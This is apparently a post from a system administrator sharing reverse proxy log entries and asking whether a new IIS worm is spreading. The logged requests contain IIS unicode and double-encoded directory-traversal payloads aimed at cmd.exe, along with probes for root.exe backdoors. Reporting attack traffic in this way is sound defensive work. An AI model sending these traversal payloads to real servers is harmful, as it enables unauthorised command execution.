Hello our reverse proxy picked this up 1034211881.427 22 217.11.99.90 TCP_MISS/503 1166 GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - NONE/- - 1034211881.925 13 217.11.99.90 TCP_MISS/503 1166 GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe? - NONE/- - 1034211882.393 19 217.11.99.90 TCP_MISS/503 1166 GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe? - NONE/- - 1034211882.852 10 217.11.99.90 TCP_MISS/503 1166 GET http://www/scripts/..%c1%9c../winnt/system32/cmd.exe? - NONE/- - 1034211883.297 5 217.11.99.90 TCP_MISS/503 1168 GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe? - NONE/- - 1034211883.836 20 217.11.99.90 TCP_MISS/503 1164 GET http://www/scripts/..%%35c../winnt/system32/cmd.exe? - NONE/- - 1034211887.664 22 217.11.99.90 TCP_MISS/503 1172 GET http://www/scripts/..%25%35%63../winnt/system32/cmd.exe? - NONE/- - 1034211888.285 19 217.11.99.90 TCP_MISS/503 1164 GET http://www/scripts/..%252f../winnt/system32/cmd.exe? - NONE/- - 1034215688.223 16 217.11.99.90 TCP_MISS/503 1116 GET http://www/scripts/root.exe? - NONE/- - 1034215689.027 29 217.11.99.90 TCP_MISS/503 1112 GET http://www/MSADC/root.exe? - NONE/- - 1034215689.564 13 217.11.99.90 TCP_MISS/503 1132 GET http://www/c/winnt/system32/cmd.exe? - NONE/- - 1034215690.138 3 217.11.99.90 TCP_MISS/503 1132 GET http://www/d/winnt/system32/cmd.exe? - NONE/- - 1034215690.962 20 217.11.99.90 TCP_MISS/503 1164 GET http://www/scripts/..%255c../winnt/system32/cmd.exe? - NONE/- - 1034215691.552 27 217.11.99.90 TCP_MISS/503 1206 GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - NONE/- - 1034215692.265 19 217.11.99.90 TCP_MISS/503 1206 GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - NONE/- - 1034215693.017 10 217.11.99.90 TCP_MISS/503 1262 GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c. ./winnt/s Is there some new IIS/Windows worm spreading? Thanks, Philipp